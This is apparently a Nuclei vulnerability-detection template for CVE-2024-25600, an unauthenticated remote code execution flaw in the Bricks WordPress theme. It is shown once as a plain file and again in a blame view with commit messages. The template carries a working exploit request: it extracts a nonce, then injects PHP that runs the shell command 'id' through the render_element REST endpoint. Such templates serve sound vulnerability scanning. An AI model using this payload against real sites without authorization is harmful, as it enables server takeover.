nuclei-templates/http/cves/2024/CVE-2024-25600.yaml

id: CVE-2024-25600

info:
  name: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
  author: christbowel
  severity: critical
  description: |
    Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
    - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/
    - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
    - https://github.com/Chocapikk/CVE-2024-25600
    - https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/themes/bricks/"
  tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-json/bricks/v1/render_element HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "postId": "1",
          "nonce": "{{nonce}}",
          "element": {
            "name": "container",
            "settings": {
              "hasLoop": "true",
              "query": {
                "useQueryEditor": true,
                "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
                "objectType": "post"
              }
            }
          }
        }
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "Exception:"
          - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'nonce":"([0-9a-z]+)'
        internal: true
# digest: 4a0a00473045022100a5bd80c7b1b78947e5625bc99d789dda7abab3a15d72d576e5e041a07373107702200f34940f17f5cb59266839d45826cad4832c7a1cb63955dd87d2ae154c68c50e:922c64590222798bb761d5b6d8e72950
-												Nuclei template for CVE-2024-25600
											
										
										
											2024-02-21 02:32:04 +00:00
+								id: CVE-2024-25600
 								info:
 								  name: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
 								  author: christbowel
 								  severity: critical
-												added metadata
											
										
										
											2024-02-21 02:52:49 +00:00
+								  description: |
 								    Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities
-												Nuclei template for CVE-2024-25600
											
										
										
											2024-02-21 02:32:04 +00:00
+								  reference:
 								    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
 								    - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/
 								    - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
 								    - https://github.com/Chocapikk/CVE-2024-25600
 								    - https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation
-												added metadata
											
										
										
											2024-02-21 02:52:49 +00:00
+								  metadata:
 								    verified: true
 								    max-request: 2
-												TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot:

											
										
										
											2024-03-23 09:28:19 +00:00
+								    publicwww-query: "/wp-content/themes/bricks/"
-												added metadata
											
										
										
											2024-02-21 02:52:49 +00:00
+								  tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce
-												Nuclei template for CVE-2024-25600
											
										
										
											2024-02-21 02:32:04 +00:00
-												added metadata
											
										
										
											2024-02-21 02:52:49 +00:00
+								http:
-												Nuclei template for CVE-2024-25600
											
										
										
											2024-02-21 02:32:04 +00:00
+								  - raw:
 								      - |
-												added metadata
											
										
										
											2024-02-21 02:52:49 +00:00
+								        GET / HTTP/1.1
-												Nuclei template for CVE-2024-25600
											
										
										
											2024-02-21 02:32:04 +00:00
+								        Host: {{Hostname}}
 								      - |
-												added metadata
											
										
										
											2024-02-21 02:52:49 +00:00
+								        POST /wp-json/bricks/v1/render_element HTTP/1.1
-												Nuclei template for CVE-2024-25600
											
										
										
											2024-02-21 02:32:04 +00:00
+								        Host: {{Hostname}}
 								        Content-Type: application/json
 								        {
 								          "postId": "1",
 								          "nonce": "{{nonce}}",
 								          "element": {
 								            "name": "container",
 								            "settings": {
 								              "hasLoop": "true",
 								              "query": {
 								                "useQueryEditor": true,
 								                "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
 								                "objectType": "post"
 								              }
 								            }
 								          }
 								        }
-												added metadata
											
										
										
											2024-02-21 02:52:49 +00:00
+								    matchers-condition: and
-												Nuclei template for CVE-2024-25600
											
										
										
											2024-02-21 02:32:04 +00:00
+								    matchers:
-												regex update
											
										
										
											2024-02-21 02:59:36 +00:00
+								      - type: regex
-												added metadata
											
										
										
											2024-02-21 02:52:49 +00:00
+								        part: body
-												regex update
											
										
										
											2024-02-21 02:59:36 +00:00
+								        regex:
-												Nuclei template for CVE-2024-25600
											
										
										
											2024-02-21 02:32:04 +00:00
+								          - "Exception:"
-												regex update
											
										
										
											2024-02-21 02:59:36 +00:00
+								          - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
-												added metadata
											
										
										
											2024-02-21 02:52:49 +00:00
+								        condition: and
-												Nuclei template for CVE-2024-25600
											
										
										
											2024-02-21 02:32:04 +00:00
 								    extractors:
 								      - type: regex
 								        name: nonce
 								        part: body
 								        group: 1
 								        regex:
 								          - 'nonce":"([0-9a-z]+)'
 								        internal: true
-												Auto Template Signing [Mon Mar 25 11:57:16 UTC 2024] :robot:

											
										
										
											2024-03-25 11:57:16 +00:00
+								# digest: 4a0a00473045022100a5bd80c7b1b78947e5625bc99d789dda7abab3a15d72d576e5e041a07373107702200f34940f17f5cb59266839d45826cad4832c7a1cb63955dd87d2ae154c68c50e:922c64590222798bb761d5b6d8e72950